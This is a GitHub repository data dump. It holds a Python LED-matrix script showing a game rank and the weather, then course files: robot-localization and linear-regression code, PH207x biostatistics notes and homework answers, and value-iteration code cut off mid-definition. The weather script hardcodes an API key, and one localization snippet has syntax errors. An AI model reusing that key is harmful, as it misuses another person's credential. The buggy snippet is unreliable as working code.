'Silver 4', 'Silver 3', 'Silver 2', 'Silver 1']:\n rank_color = '#C0C0C0'\n elif summoner_rank in ['Gold 5', 'Gold 4', 'Gold 3', 'Gold 2', 'Gold 1']:\n rank_color = '#FFD700'\n elif summoner_rank in ['Platinum 5', 'Platinum 4', 'Platinum 3', 'Platinum 2', 'Platinum 1']:\n rank_color = '#3F9896'\n elif summoner_rank in ['Diamond 5', 'Diamond 4', 'Diamond 3', 'Diamond 2', 'Diamond 1']:\n rank_color = '#64BFDE'\n else:\n rank_color = \"#FFFFFF\"\n return rank_color\n\n\ndef get_lp_color(summoner_lp):\n if summoner_lp == 0:\n lp_color = \"#FF0000\"\n elif summoner_lp <= 75:\n lp_color = \"#FFFFFF\"\n else:\n lp_color = \"#0DBA3E\"\n return lp_color\n\n\ndef main():\n # PREPARATION: LEAGUE STUFF\n try:\n summoner_rank = get_league_stats()['rank']\n summoner_league_points = get_league_stats()['league_points']\n except TypeError:\n matrix.Clear()\n image_league_fail2 = Image.new(\"RGB\", (64, 32))\n draw2 = ImageDraw.Draw(image_league_fail2)\n draw2.text((1, 1), \"Enter your\", font=font7, fill=\"#FF0000\")\n draw2.text((1, 10), \"League and\", font=font7, fill=\"#FF0000\")\n draw2.text((1, 19), \"division:\", font=font7, fill=\"#FF0000\")\n matrix.SetImage(image_league_fail2.im.id, 0, 0)\n summoner_rank = input(\"\")\n matrix.Clear()\n image_league_fail3 = Image.new(\"RGB\", (64, 32))\n draw3 = ImageDraw.Draw(image_league_fail3)\n draw3.text((1, 1), \"Enter your\", font=font7, fill=\"#FF0000\")\n draw3.text((1, 10), \"League Points\", font=font7, fill=\"#FF0000\")\n matrix.SetImage(image_league_fail3.im.id, 0, 0)\n summoner_league_points = int(input(\"\"))\n # PREPARATION: WEATHER STUFF\n try:\n while True:\n try:\n owm = pyowm.OWM('5c50d5ab850e6a5ea0870a4794df3a9e')\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n curr_weather_code = curr_weather.get_weather_code()\n api_failure = False\n except pyowm.exceptions.api_call_error.APICallError:\n print('API Call Failed. Proceeding')\n api_failure = True\n # FIRST STEP: NAME\n for x in range(0, 6):\n matrix.Clear()\n image_name = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_name)\n draw.text((0, 0), \"Eli Vosniak\", font=font8, fill=\"#FFFFFF\")\n matrix.SetImage(image_name.im.id, get_rand_x(), get_rand_y())\n time.sleep(5)\n matrix.Clear()\n matrix.Clear()\n # SECOND STEP: LOL\n rank_color = get_ranked_color(summoner_rank)\n lp_color = get_lp_color(summoner_league_points)\n for x in range(0, 3):\n matrix.Clear()\n image_summoner_name = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_summoner_name)\n draw.text((1, 12), \"Finis Aeter num\", font=font7, fill=\"#FFFFFF\")\n matrix.SetImage(image_summoner_name.im.id, 0, 0)\n time.sleep(5)\n matrix.Clear()\n image_summoner_rank = Image.new(\"RGB\", (64, 32))\n draw2 = ImageDraw.Draw(image_summoner_rank)\n draw2.text((6, 6), summoner_rank, font=font8, fill=rank_color)\n draw2.text((30, 18), str(summoner_league_points) + \"LP\", font=font8, fill=lp_color)\n matrix.SetImage(image_summoner_rank.im.id, 0, 0)\n time.sleep(5)\n matrix.Clear()\n # STEP 3: WEATHER\n if not api_failure:\n if curr_weather_code == 804:\n display_overcast_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 803:\n display_broken_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 802:\n display_scattered_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 801:\n display_few_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 800:\n display_clear_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [200, 201, 202, 210, 211, 212, 221, 230, 231, 232]:\n display_thunderstorm_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [300, 301, 302, 310, 311, 312, 313, 314, 321, 500, 501, 502, 503, 504, 511,\n 520, 521, 522, 531]:\n display_rain_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [600, 601, 602, 611, 612, 615, 616, 620, 621, 622]:\n display_snow_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [701, 711, 721, 731, 741, 751, 761, 762]:\n display_mist_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [781, 900]:\n display_tornado_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n else:\n print('Failed')\n except KeyboardInterrupt:\n print('\\nQuitting...')\n matrix.Clear()\n\n\nmain()\n" } ]
1
erichilarysmithsr/Machine-Learning
https://github.com/erichilarysmithsr/Machine-Learning
0c46518e4c874f15e68718de9e43c289ab1869da
4a6a3aa84883ff14178310b0aab009ca85dcbd47
4b062a19fd489cf700bf0e7884b8774592561d69
refs/heads/master
2021-01-21T08:11:25.177594
2015-06-18T23:30:42
2015-06-18T23:30:42
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5047318339347839, "alphanum_fraction": 0.5520504713058472, "avg_line_length": 16.5, "blob_id": "7b701babfb062d04c99d25975bf7256857d1aeeb", "content_id": "0587c0caef884b4fdde555727af7490f87c357ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/CS373/Unit-1/unit-1_10.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Uniform-Probability-Quiz \n# Robot Localization\n\np=[0.2, 0.2, 0.2, 0.2, 0.2]\nworld=['green', 'red', 'red', 'green', 'green']\nZ = 'red'\npHit = 0.6\npMiss = 0.2\n\ndef sense(p, Z)\n\tq=[]\n\tn=len(p)\n\tfor i in range(n):\n\t\thit = Z == world[i])\n\t\tq.append(p[i] * (hit * pHit + (1-hit) * pMiss) )\n\treturn q\n\nprint sense(p, Z)\n\n\n" }, { "alpha_fraction": 0.5221425294876099, "alphanum_fraction": 0.5579923987388611, "avg_line_length": 24.64044952392578, "blob_id": "d59e356f0a5fa477deba6f94a155b7cfe27251cb", "content_id": "63bd099472e6ef490fdf19d6c5f4aed78f6f6a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2371, "license_type": "no_license", "max_line_length": 94, "num_lines": 89, "path": "/AI-Class/Algorithms-Python/LinearRegression.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "import math\r\n\r\nclass LinearRegression:\r\n\t\"\"\" Computes the linear regression variables, w0 and w1, \r\n\tusing the formula from class:\r\n\t\r\n\tw1 = M * Sum( Xi * Yi ) - Sum( Xi ) * Sum( Yi ) / \r\n\t\t\t( M * Sum( Xi^2 ) - ( Sum( Xi )^2 )\r\n\r\n\tw0 = 1/M * Sum( Yi ) - w1 / M * Sum( Xi ) \r\n\t\t\r\n\tExample:\r\n\t>>> LinearRegression( [(2, 2), (4, 5), (6, 5), (8, 8)] ).regression()\r\n\t(0.5, 0.90000000000000002)\r\n\t\"\"\"\r\n\tdef __init__(self,v=[(2, 2), (4, 5), (6, 5), (8, 8)]):\r\n\t\t\tself.v = v\r\n\r\n\tdef x(self,i):\r\n\t\t\"The x coordinate of the element at index i\"\r\n\t\treturn self.v[i][0]\r\n\r\n\tdef y(self,i):\r\n\t\t\"The y coordinate of the element at index i\"\r\n\t\treturn self.v[i][1]\r\n\r\n\tdef square(self,x):\r\n\t\t\"Utility for computing the square of the argument (calls math.pow(x,2))\"\r\n\t\treturn math.pow(x,2)\r\n\r\n\tdef size(self):\r\n\t\t\"Returns the number of elements in the input vector\"\r\n\t\treturn len(self.v)\r\n\r\n\tdef range(self):\r\n\t\t\"The indexes to use in a for-loop (0..M-1)\"\r\n\t\treturn range(self.size())\r\n\r\n\tdef sum_xy(self):\r\n\t\t\"the sum of Xi * Yi\"\r\n\t\treturn sum( (self.x(i) * self.y(i)) for i in self.range())\r\n\r\n\tdef sum_x(self):\r\n\t\t\"the sum of Xi\"\r\n\t\treturn sum( self.x(i) for i in self.range() )\r\n\r\n\tdef sum_x2(self):\r\n\t\t\"the sum of Xi^2\"\r\n\t\treturn sum( self.square(self.x(i)) for i in self.range() )\r\n\r\n\tdef sum_y(self):\r\n\t\t\"the sum of Yi\"\r\n\t\treturn sum( self.y(i) for i in self.range() )\r\n\r\n\tdef w1(self):\r\n\t\t\"\"\" w1 = M * Sum( Xi * Yi ) - Sum( Xi ) * Sum( Yi ) / \r\n\t\t\t( M * Sum( Xi^2 ) - ( Sum( Xi )^2 ) \"\"\"\r\n\t\tm = self.size()\r\n\t\tsxy = self.sum_xy()\r\n\t\tsx = self.sum_x()\r\n\t\tsy = self.sum_y()\r\n\t\tsx2 = self.sum_x2()\r\n\t\treturn (m * sxy - sx*sy)/float( m * sx2 - self.square(sx) )\r\n\r\n\tdef w0(self):\r\n\t\t\" w0 = 1/M * Sum( Yi ) - w1 / M * Sum( Xi ) \"\r\n\t\tm = self.size()\r\n\t\tsy = self.sum_y()\r\n\t\tsx = self.sum_x()\r\n\t\treturn 1/float(m) * sy - self.w1()/float(m) * sx\r\n\r\n\tdef regression(self):\r\n\t\t\"\"\"Computes the linear regression variables and returns \r\n\t\t\t the result as a tuple consisting of (w0, w1) \"\"\"\r\n\t\treturn (self.w0(), self.w1())\r\n\r\n\tdef predictY(self,x):\r\n\t\t\"\"\"Predicts the y value using the w0 and w1 according to the formula:\r\n\t\t\t y = w1 * x + w0\r\n\t\t\"\"\"\r\n\t\treg = self.regression()\r\n\t\tw1=float(reg[1])\r\n\t\tw0=float(reg[0])\r\n\t\treturn (x, w1*x + w0)\r\n\r\n\tdef loss(self):\r\n\t\tw0=self.w0()\r\n\t\tw1=self.w1()\r\n\t\treturn sum( self.square(float(self.y(i)) - w1*float(self.x(i)) - w0) for i in self.range() )\r\n" }, { "alpha_fraction": 0.45390069484710693, "alphanum_fraction": 0.5141844153404236, "avg_line_length": 26.700000762939453, "blob_id": "9c0b490c651ee82ed43366697173fa21011e896e", "content_id": "2560fd4296a66a8178f76759aa027cf1dd95342f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 282, "license_type": "no_license", "max_line_length": 95, "num_lines": 10, "path": "/PH207x/excercises/Lesson7/Comparing Two Proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Comparing Two Proportions #\n> P_1 vs P_2 => P_1 ?= P_2\n> P_1 - P_2 ?= 0\n\n> P_1 / P_2 ?= 1\tP_2 != 0\n\n## Odds ##\n> If the propability of an event A is p, then the *odds* of the event are p/(1-p), or p:(1-p) \n> If p is small then odds is ca. p: \n> p/(1-p) ~ P(1+p) for p ~ 0 \n\n\n\n" }, { "alpha_fraction": 0.5863414406776428, "alphanum_fraction": 0.6385365724563599, "avg_line_length": 47.761905670166016, "blob_id": "2276d0f5b43c49d634ad4f125196e0eea2bf0aef", "content_id": "aa5072770b004afdf13e69cb0f42a663e5f1145e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2056, "license_type": "no_license", "max_line_length": 401, "num_lines": 42, "path": "/PH207x/excercises/Lesson7/ Chi Square Goodness of Fit Test.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Chi Square Goodness of Fit Test - x² statistics #\n> \n> x²= SUM of all cells [ ( obs- exp )² / exp ] \n> d.f.=(#rows-1)(#columns-1) \n> \n\n\ttab diabetes1 sex1, chi col\n\ttab diabetes3 sex1, chi col\n\ttab diabetes3 sex1, chi col miss\n\n\n## Continuity correction factor ##\n> In 2x2 tables (only) we apply a continuity correction factor: \n> x²= SUM of all cells [ ( |obs-exp|-0.5 )² / exp ] \n> \n> So x² is an idea of how far these expecteds are from these observed. \n\n\tcci 358 229 2492 2745\n\n# R X C Tables #\n> e.g. Accuracy of Death Certificates\n> CS= Certificate Status\n\n\ttabi 157 18 54\\268 44 34\n\nHospital | CS Conf. Accur. | CS Inacc. No. Ch. | CS Incorr. Recode | Total\n-------- | --------------- | ----------------- | ----------------- | --------\nComm. | 157 | 18 | 54 | 229\nTeach. | 268 | 44 | 34 | 346\nTotal | 425 | 62 | 88 | 575\n\n\ttab diabetes3 sex1, chi col miss\n\n> Now the null hypothesis is that it doesn't matter. The row classification is independent of the column classification.That means that take these 88, roughly a third of them should go up\nhere and a third of them should come down here.\n\n\ttabplot hospital status [iw=frequency],perc(status)\n\ttabplot hospital status [iw=frequency],perc(hospital)\n\n> When we submit this to Stata we get that the p-value is 0.001.That's telling us that when we compare this to that, 18 to the 24.7, 54 to the 35, to 268 and compare that to 255.7. When we compare what we actually observed to what we expect to see if **there is no relationship between the row and column classifications, then the value we get is much bigger than we would expect purely by chance.** \n> \n> And the p-value is there, less than 0.005. So we would reject this null hypothesis at the 0.05 level. And that is how we test an r by c. It's a simple extension of the two by two table except, remember, we don't do a continuity correction. We only do that with the two by two tables.\n\n\n" }, { "alpha_fraction": 0.7321107387542725, "alphanum_fraction": 0.7497302889823914, "avg_line_length": 76.22222137451172, "blob_id": "199a98fc4e4dae77804e5d476fb48eb3168d72db", "content_id": "3785934214b5bee3110cd77acf7c0ac89ce010b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2781, "license_type": "no_license", "max_line_length": 528, "num_lines": 36, "path": "/PH207x/homework/seven/Final Thoughts on the Blood Transfusion Trial.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Final Thoughts on the Blood Transfusion Trial #\n> Continue using the Fergusson et al. (2012) clinical trial example from the previous two problems to complete the following questions.\n\n#### 1. In the previous questions, we looked at three different tests of association: the Pearson Chi-square test, a 95% confidence interval for the odds ratio, and a risk difference test. ####\n\n##### Are the results of these three tests consistent? #####\n> Yes \n> No\n\n##### Would you expect the results of the three tests to be consistent? #####\n> Yes \n> No \n\n#### 2. Is there evidence of an association between blood group assignment and the composite outcome? #####\n> Yes \n> No\n\n#### 3. Think back to the Bonferroni correction from last week. If you were tasked with conducting hypothesis tests comparing the two blood groups for each of the 5 different outcomes, would you need to correct for multiple comparisons? #####\n> Yes \n> No\n\n\n#### 4. In this study, the authors state that they powered the study to detect an absolute difference of 15% in the two groups with 80% power, using a 2-sided test with alpha=0.05. After a few more adjustments, their final sample size calculation was 450. #####\n> Now suppose you want to replicate the study using a different population. Given that the authors did not find an association in their data, you decide to increase the power and decrease the difference detected between standard and fresh groups. Using an equal number of infants in both groups, what is the total sample size needed in order to achieve 90% power, assuming that the proportion of infants experiencing the composite outcome in the standard group was 55% and 45% in the fresh blood group (again, with alpha=0.05).\n> **Hint1:** You can simply use stata dropdown menus as follows ... Statistics >> Power and Sample size >> Tests of means and proportions >> 2 sample comparison proportions >> input your proportions in 0.** way >> go to options and adjust the significance level and the power >> hit submit ... finally use your calculator ....... Good luck \n\n\tsampsi .45 .55, alpha(0.05) power(0.90)\n\n> total sample size= **1088**\n\n\n#### 5. Consider a covariate, the clinical risk index for babies (CRIB), which was measured in the infants enrolled in the clinical trial. CRIB is usually associated with the composite outcome. From the baseline characteristics table in the Fergusson et al paper, we find that the median and IQR for CRIB is similar between the standard and fresh blood groups. This suggests that the distribution of CRIB is similar in both groups. #####\n> True or False: Because the distribution of CRIB is similar betwen groups, the study investigators would not have gained any power to detect an effect by matching on CRIB score. \n> \n> => **Yes** \n> No\n\n" }, { "alpha_fraction": 0.6743630766868591, "alphanum_fraction": 0.7285031676292419, "avg_line_length": 45.44444274902344, "blob_id": "a1c29f4f9d86c638d972d5cb786504a15f0c216e", "content_id": "5bc6a912dfee193626133fd5c4ab8573a411121a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1256, "license_type": "no_license", "max_line_length": 331, "num_lines": 27, "path": "/PH207x/homework/six/Bed Occupancy in Two Hospitals.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Bed Occupancy in Two Hospitals#\nAn investigator performs a bed-occupancy survey on July 1, 2012 at two hospitals (Hospital A and Hospital B). \nHospital A has 100 available beds. \nHospital B is larger with 200 available beds. \nHospital A reports that 80 of its beds are occupied on the day of the survey (occupancy prevalence = 0.80).\n\n1. The investigator reports a Prevalence Odds Ratio of 2.25 when comparing the occupancy prevalence of Hospital B to that for Hospital A. What is the occupancy prevalence for Hospital B on that day? \n\nPrevalence Odds Ratio=2.25\n\n(occ.bed/non occ bed)=2.25*4, \n(occ bed+non occ bed)=200\n(occ bed+non occ bed)=2.25*4*(non occ bed)+(non occ bed)=200\n\nocc bed= 9*(non occ bed)-non occ bed+(non occ bed)\n\nocc prev for hospB=occ bed/200\n\nJust sharing the step: We've known the total beds for\nHb = 200 \ny= 9/1\n\n1) OR(Hb to Ha) = OR(Hb)/ OR(Ha) \n2) OR(Hb) = OR(Hb to Ha)*OR(Ha)=2.25*4= y\n\n\nExample : Total students are 49. How many female and male students if the ratio is 3:4? Answer : *Female : (3/7)*49 = 21 *Male : (4/7)*49=28 Formula above is same to calculate OR(Hb) that I wrote. So, after you know the count of beds that occupied and not occupied in hospital B, ofcourse, you can calculate its occupied prevalance\n\n\n" }, { "alpha_fraction": 0.5829655528068542, "alphanum_fraction": 0.6003971695899963, "avg_line_length": 23.034990310668945, "blob_id": "d0c1825a201175e0fdf92f7bd6f052af908e25d3", "content_id": "b65531517f072155d8d6350a86103f6424f46088", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13596, "license_type": "no_license", "max_line_length": 115, "num_lines": 543, "path": "/AI-Class/Algorithms-Python/ValIter.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"\r\nA module for the value iteration algorithm for ai-class.com.\r\nThe simple Grid World is easily handled. How about other worlds?\r\n\"\"\"\r\n\r\nimport random\r\nimport math\r\n\r\n\r\n\r\n# Convenience hack for using 'a3', 'c2' notation instead of x, y coordinates.\r\nROW_LETTERS=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\n\r\ndef letterToIndex(x):\r\n\t\"\"\" Converts the lowercase row letter to a 0 based index. \r\n\t\t>>> letterToIndex('a')\r\n\t\t0\r\n\t\t>>> letterToIndex('aa')\r\n\t\t52\r\n\t\t>>> letterToIndex('b')\r\n\t\t1\r\n\t\t>>> letterToIndex('bb')\r\n\t\t53\r\n\t\t>>> letterToIndex('A')\r\n\t\t26\r\n\t\"\"\"\r\n\tlen_x = len(x)\r\n\tnum_letters = len(ROW_LETTERS)\r\n\tindex = -1\r\n\tfor i in xrange(num_letters):\r\n\t\tif ROW_LETTERS[i] == x[0]:\r\n\t\t\tindex = i\r\n\t\t\tbreak\r\n\tif index == -1:\r\n\t\traise KeyError(x)\r\n\r\n\treturn (num_letters * (len_x-1) + index)\r\n\r\ndef indexToLetter(x):\r\n\t\"\"\" Converts the zero-based index to a row letter. \r\n\t\t>>> indexToLetter(0)\r\n\t\t'a'\r\n\t\t>>> indexToLetter(52)\r\n\t\t'aa'\r\n\t\t>>> indexToLetter(1)\r\n\t\t'b'\r\n\t\t>>> indexToLetter(53)\r\n\t\t'bb'\r\n\t\t>>> indexToLetter(26)\r\n\t\t'A'\r\n\t\"\"\"\r\n\tsize = len(ROW_LETTERS)\r\n\ttimes = x / size + 1\r\n\treturn ROW_LETTERS[x % size] * times\r\n\r\ndef parseKey(key):\r\n\t\"\"\"\r\n\t\tReturns a tuple of two indexes \r\n\t\trepresenting row and column, respectively.\r\n\t\t\r\n\t\tThe key can be a string formated as 'a3'\r\n\t\ta tuple or list, such as (0,1) or [3,3],\r\n\t\tor ('a', 5).\r\n\r\n\t\tThe key can also be a State instance (or\r\n\t\tanything with an 'x' and 'y' attribute.\r\n\r\n\t\tWhen any variant of the alphanumeric\r\n\t\tversion is used, the column value is\r\n\t\tassumed to be indexed from 1.\r\n\r\n\t\t>>> parseKey('a1')\r\n\t\t(0, 0)\r\n\r\n\t\t>>> parseKey(['b', '2'])\r\n\t\t(1, 1)\r\n\r\n\t\t>>> parseKey([3, 6])\r\n\t\t(3, 6)\r\n\r\n\t\t>>> parseKey(['bb', 6])\r\n\t\t(53, 5)\r\n\r\n\t\t>>> parseKey(State(0,1))\r\n\t\ta2\r\n\r\n\t\t>>> parseKey(State('b',1))\r\n\t\tb1\r\n\r\n\t\t>>> parseKey(State('b1'))\r\n\t\tb1\r\n\t\"\"\"\r\n\tif isinstance(key, State):\r\n\t\treturn key\r\n\tif isinstance(key, (basestring, str)):\r\n\t\tx = letterToIndex(key[0:1])\r\n\t\ty = int(key[1:])-1\r\n\telif len(key) == 2:\r\n\t\tx, y = key\r\n\t\tif isinstance(x, (basestring, str)):\r\n\t\t\tx = letterToIndex(x)\r\n\t\t\ty = int(y) - 1\r\n\telse:\r\n\t\traise TypeError\r\n\r\n\treturn x, y\r\n\r\n\r\nclass StochasticAction(object):\r\n\tdef __init__(self, symbol, outcomes):\r\n\t\tself._outcomes = outcomes\r\n\t\tself.action = outcomes[0][0]\r\n\t\tself.symbol = symbol\r\n\r\n\tdef __str__(self):\r\n\t\treturn self.symbol\r\n\r\n\tdef __repr__(self):\r\n\t\treturn 'StochasticAction('+repr(self.symbol)+','+repr(self._outcomes)+')'\r\n\t\r\n\tdef move(self, world, state):\r\n\t\treturn self.action.move(world, state)\r\n\r\n\tdef outcomes(self, world, state):\r\n\t\treturn self.combine_outcomes( [Outcome(a.move(world, state), p) \r\n\t\t\tfor (a, p) in self._outcomes])\r\n\r\n\tdef combine_outcomes(self, uncombined):\r\n\t\t# split the outcomes into buckets based on the state of the outcome;\r\n\t\t# outcomes with the same state can then be combined\r\n\t\tstateMap = dict()\r\n\t\tfor o in uncombined:\r\n\t\t\ts = str(o.state)\r\n\t\t\tif s in stateMap:\r\n\t\t\t\tstateMap[s].append(o)\r\n\t\t\telse:\r\n\t\t\t\tstateMap[s] = [o]\r\n\r\n\t\tresult = []\r\n\t\tfor outcomes in stateMap.values():\r\n\t\t\to = outcomes[0]\r\n\t\t\tfor i in xrange(1,len(outcomes)):\r\n\t\t\t\to = (o + outcomes[i])\r\n\t\t\tresult.append(o)\r\n\r\n\t\treturn result\r\n\r\nclass Action(object):\r\n\tdef __init__(self, symbol, xStep=0, yStep=0):\r\n\t\tself.xStep = xStep\r\n\t\tself.yStep = yStep\r\n\t\tself.symbol = symbol\r\n\t\r\n\tdef __str__(self):\r\n\t\treturn self.symbol\r\n\r\n\tdef __repr__(self):\r\n\t\treturn 'Action('+repr(self.symbol)+','+repr(self.xStep)+','+repr(self.yStep)+')'\r\n\r\n\tdef outcomes(self, world, state):\r\n\t\treturn [Outcome(self.move(world, state), 1.0)]\r\n\t\r\n\tdef move(self, world, state):\r\n\t\tnewState = (state.x + self.xStep), (state.y + self.yStep)\r\n\t\tif newState in world and not world.isImpasse(newState):\r\n\t\t\treturn world.state(newState)\r\n\t\telse:\r\n\t\t\treturn state\r\n\r\nclass Outcome(object):\r\n\t\"\"\" An outcome for a particular action. The resultant \r\n\t\tstate and probability are contained here. \"\"\"\r\n\tdef __init__(self, state, probability):\r\n\t\tself.state = state\r\n\t\tself.p = probability\r\n\t\r\n\tdef combinesWith(self, other):\r\n\t\treturn self.state == other.state\r\n\r\n\tdef combine(self, other):\r\n\t\tassert self.combinesWith(other)\r\n\r\n\t\treturn Outcome(self.state, self.p + other.p)\r\n\r\n\tdef __add__(self, other):\r\n\t\treturn self.combine(other)\r\n\r\n\tdef __repr__(self):\r\n\t\treturn \"Outcome[\"+str(self.state)+\", probability=\"+str(self.p)+\"]\"\r\n\r\nclass AbsorbingValue(object):\r\n\tdef __init__(self,value):\r\n\t\tself.value = value\r\n\tdef __str__(self):\r\n\t\treturn'%+d' % self.value\r\n\tdef __repr__(self):\r\n\t\t'AbsorbingValue('+repr(self.value)+')'\r\n\r\nclass Obstacle(object):\r\n\tdef __init__(self,symbol):\r\n\t\tself.symbol = symbol\r\n\tdef __repr__(self):\r\n\t\treturn 'Obstacle('+repr(self.symbol)+')'\r\n\tdef __str__(self):\r\n\t\treturn str(self.symbol)\r\n\r\nclass State(object):\r\n\t\"\"\" A location in the Grid World. It should be immutable (x and y not changed).\r\n\t\tIt's value can change, but that state is owned by the World object, not the \r\n\t\tState.\r\n\t\"\"\"\r\n\tdef __init__(self, x, y=None):\r\n\r\n\t\tif y is None:\r\n\t\t\tself.x, self.y = parseKey(x)\r\n\t\telse:\r\n\t\t\tself.x, self.y = parseKey((x, y))\r\n\r\n\tdef __eq__(self, other):\r\n\t\treturn isinstance(other, State) \\\r\n\t\t\t\tand self.x == other.x \\\r\n\t\t\t\tand self.y == other.y\r\n\r\n\tdef __hash__(self):\r\n\t\treturn 13*hash(self.x) + 17*hash(self.y)\r\n\r\n\tdef __repr__(self):\r\n\t\treturn indexToLetter(self.x) + str(self.y+1) \r\n\r\n\tdef __len__(self):\r\n\t\t\"\"\" The number of coordinates - always 2 (row and column) \"\"\"\r\n\t\treturn 2\r\n\r\n\tdef __getitem__(self, key):\r\n\t\t\"\"\" You can access the row index using self[0] notation \r\n\t\t\tand the column with self[1] \"\"\"\r\n\t\tif key == 0:\r\n\t\t\treturn self.x\r\n\t\telif key == 1:\r\n\t\t\treturn self.y\r\n\t\telse:\r\n\t\t\traise IndexError\r\n\r\nGOAL = AbsorbingValue(100)\r\nTRAP = AbsorbingValue(-100)\r\nBLOCK = Obstacle('[___]')\r\n\r\nclass World(object):\r\n\t\"\"\" A simple Grid world \"\"\"\r\n\r\n\tN = Action('N', -1, 0)\r\n\tS = Action('S', 1, 0)\r\n\tE = Action('E', 0, 1)\r\n\tW = Action('W', 0, -1)\r\n\r\n\tNE = Action('NE', -1, 1)\r\n\tNW = Action('NW', -1, -1)\r\n\tSE = Action('SE', 1, 1)\r\n\tSW = Action('SE', 1, -1)\r\n\r\n\tNORTH = StochasticAction('N*', [ (N, .8), (E, .1), (W, .1)])\r\n\tSOUTH = StochasticAction('S*', [ (S, .8), (E, .1), (W, .1) ])\r\n\tEAST = StochasticAction('E*', [ (E, .8), (N, .1), (S, .1) ])\r\n\tWEST = StochasticAction('W*', [ (W, .8), (N, .1), (S, .1) ])\r\n\r\n\t# Example of using non-cardinal directions:\r\n\t# NORTH = StochasticAction('NORTH', [ (N, .6), (E, .1), (W, .1), (NE, .1), (NW, .1) ])\r\n\r\n\tdef __init__(self,numRows=3, numCols=4, colWidth=7,numFmt='%.0f', actions=None, motionCost=-3,defaultValues=None):\r\n\t\tself.w = [[0]*numCols for i in xrange(numRows)]\r\n\t\tself.numCols = numCols\r\n\t\tself.numRows = numRows\r\n\t\tself.colWidth = colWidth\r\n\t\tself.numFmt = numFmt\r\n\t\tself.actions = actions \\\r\n\t\t\t\tif actions is not None \\\r\n\t\t\t\telse [World.NORTH, World.SOUTH, World.EAST, World.WEST]\r\n\t\tself.motionCost = motionCost\r\n\r\n\t\tif defaultValues:\r\n\t\t\tfor key, value in defaultValues:\r\n\t\t\t\tself[key] = value\r\n\r\n\tdef __repr__(self):\r\n\t\treturn '<' + repr(self.w) + '>'\r\n\r\n\tdef __str__(self):\r\n\t\tdef formatValue(value, x, y):\r\n\t\t\tif isinstance(value, (Obstacle, AbsorbingValue)):\r\n\t\t\t\tv = str(value)\r\n\t\t\telse:\r\n\t\t\t\tv = (self.numFmt % value)\r\n\t\t\treturn v\r\n\r\n\t\treturn self.formatGrid(formatValue)\r\n\r\n\tdef formatGrid(self,formatValue):\r\n\t\tcolWidth = self.colWidth\r\n\t\tnumCols = self.numCols\r\n\t\tnumRows = self.numRows\r\n\t\tnumFmt = self.numFmt\r\n\t\tw = self.w\r\n\t\tcolfmt = '{0:^' + str(colWidth) + 's}'\r\n\r\n\t\tbuf = []\r\n\t\tbuf.append(colfmt.format(''))\r\n\r\n\t\t# column numbers\r\n\t\tfor i in xrange(numCols):\r\n\t\t\tbuf.append(colfmt.format(str(i+1)))\r\n\t\tbuf.append('\\n')\r\n\r\n\t\tbuf.append('-' * ((numCols+1)*colWidth))\r\n\t\tbuf.append('\\n')\r\n\r\n\t\tfor j in xrange(numRows):\r\n\t\t\t# row number\r\n\t\t\tbuf.append(colfmt.format(str(indexToLetter(j)+' |')))\r\n\t\t\tr = w[j]\r\n\r\n\t\t\t# column values\r\n\t\t\tfor i in xrange(numCols):\r\n\t\t\t\tbuf.append( colfmt.format( formatValue(r[i], j, i) ) )\r\n\t\t\tbuf.append('\\n')\r\n\r\n\t\treturn ''.join(buf)\r\n\r\n\tdef state(self, x, y = None):\r\n\t\tif y is None:\r\n\t\t\tif isinstance(x, State):\r\n\t\t\t\treturn x\r\n\t\t\tnewX, newY = parseKey(x)\r\n\t\t\treturn State(newX, newY)\r\n\t\telse:\r\n\t\t\treturn State(x, y)\r\n\r\n\tdef __getitem__(self, key):\r\n\t\tx, y = parseKey(key)\r\n\t\treturn self.w[x][y]\r\n\r\n\tdef __setitem__(self, key, value):\r\n\t\tx, y = parseKey(key)\r\n\t\tself.w[x][y] = (value)\r\n\t\r\n\tdef __contains__(self, key):\r\n\t\tx, y = parseKey(key)\r\n\t\treturn (x >= 0 and x < self.numRows) \\\r\n\t\t\t\tand (y >= 0 and y < self.numCols)\r\n\t\r\n\tdef 